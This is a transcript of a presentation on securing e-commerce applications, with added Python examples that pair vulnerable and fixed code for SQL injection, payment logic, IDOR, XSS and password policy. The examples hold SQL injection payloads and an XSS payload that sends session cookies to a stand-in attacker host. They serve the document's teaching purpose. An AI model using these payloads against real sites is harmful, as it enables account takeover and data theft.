E-commerce Application Security

Presentation on theme: "E-commerce Application Security"— Presentation transcript:

1 E-commerce Application Security
Ways to secure your application from hackers. Building software is easy; building secure software is difficult. Vulnerabilities are inevitable, hacking is not.

2 You can also view a recorded session of this presentation here!
What is it all about?
- Importance of security in e-commerce
- Major attacks on e-commerce applications
- Common issues and vulnerabilities in applications
- What makes attackers target your application?
- Vulnerabilities that might be present in your application
- How do hackers attack your application?
- Do's and don'ts to improve application security

3 How does security affect e-commerce?
- Tarnishes the company's reputation in public
- Huge financial loss from post-breach activities such as notification, patching and lost business
- One breach invites many other hackers
- Loss of customers' trust
- Loss of business

4 E-commerce Hacks
What do eBay, Zappos (Amazon), Domino's and Starbucks have in common? They all suffered huge data breaches in the last few years. For more info check out: Link

5 eBay Data Breach
- Attackers compromised a small number of employee log-in credentials, allowing unauthorized access to eBay's corporate network
- The attackers obtained user information such as names, dates of birth, addresses, phone numbers and (encrypted) passwords
Lessons to learn from this hack:
- Centralize application management
- Secure employees' personal accounts
- Ensure a strong password policy
- Take a proactive stance on security

6 Starbucks Data Breach
- The Starbucks mobile app was hacked twice in a period of a few months
- Hackers stole money from several Starbucks customers by gaining access to their credit card information
- Criminals used compromised Starbucks accounts to charge the consumers' linked credit cards; they could steal hundreds of dollars in a matter of minutes
Lessons to learn from this hack:
- Secure the mobile application and the backend API
- Take proactive measures against cyber attacks, such as penetration testing and vulnerability assessments

7 Commonly Exploited Vulnerabilities
- Injection attacks such as SQL injection, leading to critical data loss
- Improper implementation of payment systems and logical vulnerabilities (X0RC0NF presentation: Link)
- Insecure mobile applications and backend API servers
- Insecure direct object reference: unrestricted access to subdomains
- Privilege escalation and authorization bypass
- Cross-site scripting: hijacking accounts
- Improper policy implementation, such as weak passwords and insecure storage

8 Injection Attacks
Injection attacks can result in data loss or corruption, lack of accountability, denial of access or complete host takeover. For example, SQL injection may lead to total compromise of your database.
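The following is an added example (not code from the original presentation) showing how SQL injection works and how a bound-parameter query stops it. It uses Python's built-in sqlite3 module against a constructed in-memory user table; the table layout, sample rows and the simplified password check (a stored hash compared inside the query) are assumptions made for the demonstration, not a description of any real shop.

```python
import sqlite3


def make_db():
    # Constructed in-memory user table for the example (not real shop data).
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT, role TEXT)"
    )
    db.executemany(
        "INSERT INTO users (email, pw_hash, role) VALUES (?, ?, ?)",
        [("alice@example.com", "hash-alice", "customer"),
         ("admin@example.com", "hash-admin", "admin")],
    )
    return db


def login_vulnerable(db, email, pw_hash):
    # The user-supplied email is spliced into the SQL text, so quote characters
    # and comment markers in it change the structure of the statement.
    # (A real app would hash the password in code; the hash is passed in here
    # only to keep the vulnerable and safe versions symmetric.)
    query = ("SELECT id, email, role FROM users WHERE email = '%s' AND pw_hash = '%s'"
             % (email, pw_hash))
    return db.execute(query).fetchall()


def login_safe(db, email, pw_hash):
    # Bound parameters: the driver sends the values separately from the SQL
    # text, so nothing in the input can alter the statement.
    return db.execute(
        "SELECT id, email, role FROM users WHERE email = ? AND pw_hash = ?",
        (email, pw_hash),
    ).fetchall()


def demo():
    db = make_db()
    # Payload 1: closes the string literal and comments out the password check,
    # which logs the attacker in as admin with any password.
    bypass = "admin@example.com' --"
    # Payload 2: always-true predicate that returns every row in the table.
    dump = "' OR 1=1 --"
    return {
        "vuln_bypass": login_vulnerable(db, bypass, "wrong"),
        "safe_bypass": login_safe(db, bypass, "wrong"),
        "vuln_dump": login_vulnerable(db, dump, "wrong"),
        "safe_dump": login_safe(db, dump, "wrong"),
        "safe_legit": login_safe(db, "alice@example.com", "hash-alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable function returns the admin row for the first payload and both rows for the second; the parameterised function returns nothing for either payload and still works for a legitimate login. The same rule applies to every other query-building API (ORMs included): never concatenate untrusted input into the statement text.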

9 Payment system and logical vulnerabilities
Payment gateways are often found to be insecurely implemented, typically by trusting amounts, coupon verdicts or payment status supplied by the client, which may lead to attacks such as payment forgery or restriction bypass. Logical vulnerabilities are hard to discover but have a huge impact on the business.
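The following is an added example (not code from the original presentation) contrasting a checkout that trusts client-submitted prices with one that recomputes the order server-side and verifies the gateway's payment notification. The catalogue, the coupon rule, the shared secret and the HMAC-signed JSON callback format are all assumptions for the demonstration; real gateways document their own signing scheme.

```python
import hashlib
import hmac
import json

# Constructed server-side catalogue and coupon rule for this example (hypothetical shop).
CATALOGUE = {"sku-100": 4999, "sku-200": 1500}        # prices in cents
COUPONS = {"WELCOME10": {"percent": 10, "min_total": 3000}}
GATEWAY_SECRET = b"hypothetical-shared-secret"         # assumption: HMAC key shared with the gateway


def checkout_vulnerable(request):
    # Trusts the total and coupon verdict computed in the browser: an attacker
    # edits the POST body to pay one cent, or marks a restricted coupon as applied.
    return {"charge": int(request["total"]),
            "coupon_applied": bool(request.get("coupon_applied", False))}


def compute_total(items, coupon=None, used_coupons=frozenset()):
    # Recompute the price from server-side data only; reject anything out of bounds.
    total = 0
    for sku, qty in items:
        if sku not in CATALOGUE or not 1 <= qty <= 50:
            raise ValueError("invalid line item: %r x %r" % (sku, qty))
        total += CATALOGUE[sku] * qty
    if coupon:
        rule = COUPONS.get(coupon)
        if rule is None or coupon in used_coupons or total < rule["min_total"]:
            raise ValueError("coupon not applicable")
        total -= total * rule["percent"] // 100
    return total


def checkout_safe(request, used_coupons=frozenset()):
    # Client-supplied "total" and "coupon_applied" fields are ignored entirely.
    items = [(line["sku"], int(line["qty"])) for line in request["items"]]
    return {"charge": compute_total(items, request.get("coupon"), used_coupons)}


def sign_callback(body: bytes) -> str:
    # Assumed gateway scheme: the server-to-server notification body is signed
    # with HMAC-SHA256 under the shared secret.
    return hmac.new(GATEWAY_SECRET, body, hashlib.sha256).hexdigest()


def callback_vulnerable(body: bytes) -> bool:
    # Marks the order paid on nothing more than a "status" field anyone can forge.
    return json.loads(body).get("status") == "paid"


def callback_safe(body: bytes, signature: str, expected_amount: int) -> bool:
    # Verify the MAC before trusting the payload, then cross-check the amount
    # against the order total recorded on our side.
    if not hmac.compare_digest(sign_callback(body), signature):
        return False
    data = json.loads(body)
    return data.get("status") == "paid" and data.get("amount") == expected_amount
```

The safe version rejects negative quantities, unknown SKUs, reused or under-threshold coupons, unsigned callbacks and callbacks whose amount does not match the stored order; each of those is a logical vulnerability a scanner will not find but a manual test will.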

10 Insecure mobile application and backend API server
Protecting only the web application from hackers is not sufficient. With the increased use of smartphones and tablets, the internet is flooded with mobile applications. These applications must also be secured against attacks, and the API calls they make must be implemented properly: the backend API is reachable by anyone with the endpoint, not only by the official app. Source: nerdwallet.com

11 Insecure direct object reference
An insecure direct object reference (IDOR) arises when an application exposes a direct reference to an internal object, such as a record, page or file, and serves it without checking that the requester is authorised to access it; changing the identifier in the request then yields another user's data. Such insecure entry points are often discovered in applications while performing a pentest. Source: slideshare.net

12 Privilege Escalation and authorization bypass
Privilege escalation enables the attacker to compromise a user's account by accessing resources that are meant to be private. If the compromised account is that of an administrator, the attacker now controls the admin functionality. Source: cyber-security-blog.com
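The following is an added example (not code from the original presentation) that covers both the insecure direct object reference slide and this privilege escalation slide, since both come down to the same missing server-side authorization check. The request shape, the session store, the order table and the user records are constructed for the demonstration and do not describe any real framework.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str          # "customer" or "admin"; lives only in server-side state


# Constructed data for the example: a server-side session store and an order table.
SESSIONS = {"tok-alice": User(1, "customer"),
            "tok-bob": User(2, "customer"),
            "tok-root": User(99, "admin")}
ORDERS = {1001: {"owner": 1, "status": "paid"},
          1002: {"owner": 2, "status": "paid"}}


class Forbidden(Exception):
    pass


def current_user(request):
    # Identity comes from the session cookie; everything else in the request is untrusted.
    try:
        return SESSIONS[request["cookies"]["session"]]
    except KeyError:
        raise Forbidden("not authenticated")


def get_order_vulnerable(request):
    # IDOR: the order id from the URL is looked up with no ownership check, so
    # alice can read /orders/1002 (bob's order) just by changing the number.
    current_user(request)                      # authenticated, but never authorised
    return ORDERS[int(request["path_params"]["order_id"])]


def get_order_safe(request):
    # Authorise against the server-side record: owner or admin only.
    user = current_user(request)
    order = ORDERS[int(request["path_params"]["order_id"])]
    if user.role != "admin" and order["owner"] != user.id:
        raise Forbidden("not your order")
    return order


def cancel_order_vulnerable(request):
    # Authorization bypass: the role is read from a client-controlled form field
    # (hidden input or JSON body), so a customer submits role=admin and escalates.
    current_user(request)
    if request["form"].get("role") != "admin":
        raise Forbidden("admins only")
    ORDERS[int(request["path_params"]["order_id"])]["status"] = "cancelled"
    return "cancelled"


def cancel_order_safe(request):
    # The role is taken from the session-backed user object, never from the request.
    user = current_user(request)
    if user.role != "admin":
        raise Forbidden("admins only")
    ORDERS[int(request["path_params"]["order_id"])]["status"] = "cancelled"
    return "cancelled"
```

The pattern to take away: authentication (who is this?) and authorization (may they touch this object, in this role?) are separate checks, and the second one must consult data the client cannot edit.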

13 Cross Site Scripting
Attackers can execute scripts in a victim's browser to hijack user sessions and steal cookies. This is one of the most common attack vectors that attackers use to steal credentials and tokens and to perform targeted attacks. Source: lifas.com
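The following is an added example (not code from the original presentation) of a reflected XSS in a search page, the output-encoding fix, and the two response headers that limit the damage when a bug slips through. The page template, the attacker payload and the hostname attacker.example are constructed for the demonstration.

```python
import html

# Constructed attacker payload: closes the value="" attribute and injects a script
# that sends document.cookie to a hypothetical attacker-controlled host.
PAYLOAD = "\"><script>new Image().src='https://attacker.example/?c='+document.cookie</script>"

# Assumed page template: the query is reflected in text context and in an attribute.
TEMPLATE = '<p>Results for: %s</p>\n<input name="q" value="%s">'


def render_search_vulnerable(query: str) -> str:
    # Reflects the raw query into both contexts; the browser parses the payload as markup.
    return TEMPLATE % (query, query)


def render_search_safe(query: str) -> str:
    # html.escape(quote=True) converts & < > " ' to entities, so the payload is
    # shown as text in both the element and the attribute instead of executing.
    safe = html.escape(query, quote=True)
    return TEMPLATE % (safe, safe)


def session_cookie_header(token: str) -> str:
    # Defence in depth: HttpOnly keeps the session token out of document.cookie
    # even if a script does run; Secure and SameSite limit where it is sent.
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % token


def csp_header() -> str:
    # A restrictive CSP refuses inline scripts, so an injected <script> block
    # is not executed even when encoding was missed somewhere.
    return "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'"


def contains_live_script(page: str) -> bool:
    # Crude check used only to show the difference between the two renderers.
    return "<script" in page.lower()
```

Encoding has to match the context the data lands in (HTML body, attribute, JavaScript string, URL); `html.escape` covers the first two, which is why the safe renderer is correct for this template but would not be enough for a value written into a `<script>` block.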

14 Improper Policy implementations: A Weak Password
A weak password policy that allows users to set weak passwords makes the application vulnerable to attacks such as brute force and password guessing. Source: betanews.com
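The following is an added example (not code from the original presentation) of the three controls that slide 7 and this slide call for: a password policy that rejects weak choices, per-account throttling against brute force and guessing, and salted PBKDF2 storage so a stolen table is not directly usable. The tiny breached-password set, the thresholds (12 characters, 5 attempts, 15-minute lockout) and the storage format are assumptions for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed stand-in for a breached-password list; a real deployment would
# check against a large corpus such as a leaked-password dataset.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "password1", "letmein", "welcome"}


def policy_check(password: str, username: str) -> list:
    # Returns the list of policy violations; empty means the password is acceptable.
    problems = []
    if len(password) < 12:
        problems.append("shorter than 12 characters")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in breached-password list")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    return problems


class LoginGuard:
    # Per-account throttle: after MAX_FAILURES consecutive failures the account is
    # locked for LOCKOUT_SECONDS, which caps online guessing at a handful of tries.
    MAX_FAILURES = 5
    LOCKOUT_SECONDS = 900

    def __init__(self):
        self.failures = {}      # username -> consecutive failed attempts
        self.locked_until = {}  # username -> unlock time in seconds

    def attempt(self, username: str, password_correct: bool, now: float) -> str:
        # 'now' is injected so the behaviour is deterministic and testable.
        if self.locked_until.get(username, 0) > now:
            return "locked"
        if password_correct:
            self.failures.pop(username, None)
            return "ok"
        self.failures[username] = self.failures.get(username, 0) + 1
        if self.failures[username] >= self.MAX_FAILURES:
            self.locked_until[username] = now + self.LOCKOUT_SECONDS
            self.failures.pop(username, None)
            return "locked"
        return "denied"


def hash_password(password: str, salt: bytes = None) -> str:
    # Salted, iterated hash: stolen records cannot be reversed with a lookup table.
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(digest.hex(), digest_hex)
```

Note that the throttle keys on the account, not the source IP, so a distributed guessing campaign against one account is still stopped; pair it with an IP-based rate limit to slow password spraying across many accounts.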

15 Hacker's Jackpot
- Credit card data and personal info such as phone numbers and addresses can be sold on the black market
- Personal info can be used for blackmail and phishing
- An unencrypted database can be sold very easily to competitors
"If you're a customer, you may want to know that we have offered Domino's not to publish your data in exchange for €30,000" (tweet by the hackers after the Domino's hack)
Financial services are amongst the top 3 most attacked services on the internet (2015 DBIR, Verizon)

16 What Hackers look for
- Unpatched servers or network devices
- Insecure, vulnerable implementations of known software such as WordPress
- Older/outdated software with known, publicly available exploits
- Common vulnerabilities like CSRF, XSS, lack of HTTPS, brute-forcing etc.
- Subdomains without proper authorization, or with sensitive data exposed publicly
"In our experience, 30-45% of applications have one or more critical vulnerabilities."
47% of all breaches in the 2015 study were caused by malicious or criminal attacks (DBIR, Verizon)

17 How hackers attack
- Choose the weakest link to attack: the web application, unpatched servers, employee credentials etc.
- Find a vulnerability in the web application to steal credentials or user data, and exploit it
- One XSS in any page may lead to admin account compromise
- Search for any vulnerable implementation of known software like WordPress or Magento; hacking a weak WordPress blog is far easier than hacking the main website itself
- Exfiltrate data stealthily

18 Safeguarding
It might be dark, but the light is not very far.
- Proactively discover and remediate application vulnerabilities in a timely manner
- A good penetration test will discover logical vulnerabilities and authorization issues too
- Make sure to assess all subdomains, servers and accessible portals. A portal is not hidden just because you have not linked to it; a simple Google search such as "site:xyz.com -www" will reveal many subdomains
- Ensure strong encryption and policies are implemented on the application and the network
- Easy-to-find vulnerabilities (XSS, CSRF, file uploads etc.) do the most damage if left unfixed
- Always audit the application server together with the web application
- Mobile applications are becoming an easy target for hackers; make sure to assess them for vulnerabilities

19 Ways to Enhance the Security of Your E-commerce Applications
More insights: to know more about application security in e-commerce apps, see the webinar recording "Ways to Enhance the Security of Your E-commerce Applications".

20 Contact Us
We are keen to know about your idea. Email us at: info@tothenew.com

